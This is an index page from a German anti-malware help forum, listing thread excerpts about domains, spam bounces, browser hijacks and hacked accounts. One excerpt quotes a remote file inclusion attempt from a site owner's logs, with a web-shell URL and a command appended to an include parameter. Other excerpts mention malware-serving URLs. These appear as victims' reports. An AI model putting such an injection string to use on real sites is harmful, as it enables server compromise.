Zurück   Trojaner-Board > Themen

Alles zum Thema: Domain

  Letzter Beitrag Antworten Hits Forum
Meine eigenen E-Mails landen im Spam!
Domain - Hallo Gemeinschaft, mir fällt immer wieder auf, dass E-Mails, die ich selbst verschicke, beim Empfänger im Spam landen. Ich vermute, dass da mal jemand diese E-Mail-Adresse missbraucht hat :heulen: Meine Frage: Wie kann ich das wieder "reparieren"? Oder wo kann ich nachsehen, ob die...
Überwachung, Datenschutz und Spam
Trojaner-Download bei Aufruf einer Webseite
Domain - Hallo, Bei der Registrierung in einem von mir betriebenen Board hat ein User eine Webseite hinterlegt. Beim Aufruf dieser Webseite w**.youngladies.de :snyper: meldet mir Kaspersky Antivirus 6.0 folgendes: gefunden: trojanisches Programm Trojan-Downloader.JS.Psyme.fl URL:...
Diskussionsforum
Zombie in der Domain?
Domain - Hallo habe mal ne allg. Frage zu Spam, wir sind hier eine mittelständische Firma, mit ~ 120 rechenknechten in einer domain. seit neuestem ist ein rapider anschieg an unser firewall zu verbuchen von mails die zurückkommen von daher liegt der verdacht irgendwie nahe das wir hier nen zombie haben...
Überwachung, Datenschutz und Spam
T-onlinezugang gehackt
Domain - Ich hoff ihr könnt mir einen Tipp geben. Gestern bekomme ich von T-online lauter Mails, da hat sich einer auf meinem Zugang server + homepage + domain eingerichter. domain nennt sich holio-hats.de und wenn man da anklickt landet man auf einer free-hack.com. Ich hab Mcaffee drauf virenschutz und...
Log-Analyse und Auswertung
Login auf trojaner-board.com nicht möglich?
Domain - Ich wollte mich gerade über meinen alten Bookmark auf trojaner-board.com einloggen und sobald ich das Formular mit Benutzername und Passwort abgesendet habe kam folgende Fehlermeldung: Lucky
Lob, Kritik und Wünsche
Email-Problem: Undeliverable Mail (Re 0:) täglich 100 dieser Mails
Domain - Hallo.... ich erhalte plötzlich schon seit ca 1 Woche täglich ca 100 Mails in diesem Stil an meine email-adresse: (jedoch immer mit anderen empfängeradressen im Text angegeben) Von: MAILER-DAEMON@swip.net an: *meine Adresse* Betreff: Undeliverable mail (Re:0)
Plagegeister aller Art und deren Bekämpfung
Mail Delivery Subsystem
Domain - Ich bekomme in letzter Zeit (2-3pro Tag) "Mail Delivery Subsystem"-Emails, wie man sie normalerweise bekommt, wenn es den Account, den man angemailt hat, nicht mehr gibt. verwundern tut mich das 2 meiner Emailadr. in der Nachricht auftauchen und der name "silvio2" ist komischer weise auch der...
Plagegeister aller Art und deren Bekämpfung
Suchmaschine gehackt?!
Domain - Hallo Zusammen! Seit neustem habe ich ein Problem! Sobald ich eine Suchmaschine benutze (google oder ähnliches) und ich ein Ergebnis anklicke, werde ich anstatt auf den Link, auf eine andere Seite geleitet. Meist Seiten wie ebay oder amerikanische Pornoseiten. Mein Antyspywareprogramm zeigt...
Plagegeister aller Art und deren Bekämpfung
email Spam wird von mir versendet
Domain - Hallo und guten Tag, ich besitze mehrere Domain und verwende natürlich auch die damit verbundenen Mailsysteme. Seit einiger Zeit habe ich den Verdacht, dass über meine Mailserver Spam versendet wird. Ich erhalte täglich unzälige Emails welche nicht zugestellt werden können. Emails die ich...
Plagegeister aller Art und deren Bekämpfung
Domain Betreiber raus bekommen?
Domain - Hallo, Ich bin neu hier und habe da gleich mal eine Frage an euch. Ich hatte mal eine Seite da konnte ich beispielsweise www.rtl.de eingeben und dann zeigte er mir die kompletten Infos dieser Seite an z.b Inhaber dieser Domain usw... Leider ist mir die Seite wo man diese Infos bekommt...
Plagegeister aller Art und deren Bekämpfung
Anzeige wegen Rufmord?
Domain - also, ich bin ja hier mit lostie79 eingeloggt. und mein echter internet nick ist lost-in-emotions und habe auch .de und .com gesichert. nun hat jmd der mich lost-hirn nennt, eine schulwn webseite auf diese domain gelegt. wie stehen die gesetzlichen möglichkeiten gegen diese person vorzugehen....
Überwachung, Datenschutz und Spam
Hab mal ein Frage wegen Trojana gif bzw. hackversuch
Domain - Also bei mir auf der Webseite hat heute einer öfters versucht eine fremde Domain zu includen. Das Was er versucht hat sieht so aus h**p://meineDomain.de/include.php?file= und hat das dann angehängt h**p://br.geocities.lasichweg/cmdsharkhackers/cmd.gif?&cmd=ls hab mir dann mal die Seite angeschaut...
Plagegeister aller Art und deren Bekämpfung
Unerwünschte IE-Seite öffnet sich!?!?
Domain - Hallo, wer kann mir helfen???? Sobald ich den IE öffne, öffnet sich ein neues Fenster mit dieser Domain(s.u.)! Habe im Forum gelesen, das schon jemand ein ähnliches Problem gehabt hat. Bitte bitte helft mir! h**p://www.filost.com/banner2.aspx?day=14&hour=14 Vielen Dank im Voraus! :nixda:
Plagegeister aller Art und deren Bekämpfung
Startseitenhijacking bei IE + Refresh
Domain - Als ich seit langen mal wieder den IE benutzen wollte habe ich bemerkt, das meine Startseite von IE verändert worden ist. Das würde ich ja noch verkraften, aber die Seite lädt sich ständig neu (Sekunden Takt), eine art Refresh Wenn ich auf Abbrechen gehe und eine neue Domain eintippe verschwindet...
Plagegeister aller Art und deren Bekämpfung
zentrale verwaltung für firefox+thunderbird
Domain - Hallo, ich betreue ein kleines Netzwerk mit wenigen Clients für meine Frau und möchte die Konfiguration von FF und TB zentral steuern, insbesondere die Blacklist für Adblock. Ich verwende Samba 3.0.21 als Domain controller, die Clients sind w2k. Beim letzten Update von 1.07 auf 1.501...
Alles rund um Windows
Quizfrage: Was ist das für ein HijackThisLOG?
Domain - Na ich hab da was zum Analysiren, wer kann als erstes sagen was hier merkwürdig ist? :daumenhoc Logfile of HijackThis v1.99.0 Scan saved at 04:33:24, on 29.12.2005 Platform: Unknown Windows (WinNT 6.00.1135) MSIE: Internet Explorer v6.00 (6.00.5231.0002) Running processes:...
Log-Analyse und Auswertung
Verbindung zum FTP-server fehlgeschlagen(1und1)
Domain - Also ich hab mir jetzt bei 1&1 einen domain mit FTP-Server bestellt! alles is bis jetzt oK .... jetzt will ich meine homepage rauf laden mit dem Programm: Wise-FTP geht aber nicht !!!! es kommt der fehler_:Verbindung zum FTP-server fehlgeschlagen. ich glaube das der hostserver-name nicht bast...
Alles rund um Windows
Biete Domain malware.de
Domain - Biete die Domain malware.de an! Bei Interesse Angebote biete per PM oder via E-Mail an mm (at) eromon.de. Ciao
Alles rund um Windows
Panicware Pop up Stopper pro vs. Pop up Stopper Professional
Domain - Beim Panicaware Pop up stopper pro ist man mit der rechten Maustaste auf den Browser gegangen ,und da hat man auch sehen können, wie viele Pop ups es bei einer Seite gegeben hat, es war ein + Zeichen Icon da, um z.b bei einer Domain, die Pop Ups zu erlauben das alles ist beim pop up stopper...
Mülltonne
Was tun gegen Webseite mit Dialer?
Domain - Ich habe meine renommierte und gut besuchte Domain www.rauchen.de verkauft. Der Käufer versprach mir, sie auch weiterhin als Seite gegen das Rauchen zu benutzen. Nachdem gestern der Wechsel vollzogen wurde, musste ich feststellen, dass dort eine Zugangssoftware geladen werden muss, die ein anderer...
Plagegeister aller Art und deren Bekämpfung
rewrite
Domain - Hallo zusammen, im traffikklau-Forum kommen immer wieder Probleme mit dem Schutz durch rewrite in der .htaccess hoch. Nun erhoffe ich mir von der hier vertretenen erstaunlichen Sachkompetenz Hilfe bei den zwei Fragen, die ich zu diesen Thema habe: Können Dateitypen unterschiedlich behandelt...
Alles rund um Windows
Wieso startet ungefragt ein Downloadfenster?
Domain - Hallo im Forum? Ein Kunde von mir ruft seine Website auf und bekommt bei Eingabe der Domain das Angebot, eine Datei herunterzuladen. Der Effekt tritt nur im IE 5.X auf. Wenn der Seitenaufruf mit www.domain.de/index.htm erfolgt, wird der Download nicht angeboten. Hat jemand eine Idee, wonach zu...
Plagegeister aller Art und deren Bekämpfung
Hilfe! Ich bekomme dauernd Viren zugeschickt!
Domain - Hilfe!!! Ihr müsst mir unbedingt helfen! Ich bekomme dauernd Viren zugeschickt. Ich habe bei www.strato.de eine eigene Internetdomain gehostet - und jetzt kommen dauernd Viren an! Es ist aber nur der Sobig - Wurm. Ich weis, dass es Absicht ist - die Betreffe sind nämlich z.b:" Here is that...
Plagegeister aller Art und deren Bekämpfung
Hiiiiiilfe
Domain - ich krieg bei Mozillamail beim versenden von Mail jedesmal ne Fehlermeldung: >domain of sender adress (...) does not exist. please verify that your mail address is correct in your mail preferences.< bei Eingangsmail hab ich jedoch überhaupt keine probs - woran kann das liegen?? ist das...
Netzwerk und Hardware
Seltsame Emails an mich selbst!
Domain - Hallo zusammen! Ich habe seit drei Tagen ein Problem, welches mich wirklich sehr beschäftigt. Vorgestern erhielt ich die erste eine Reiher von kuriosen Emails. Die Trug als Absender meinen Namen, nur nicht mit Domain und hatte einen undefinierbaren Anhang. Selbstredend habe ich diese Email...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.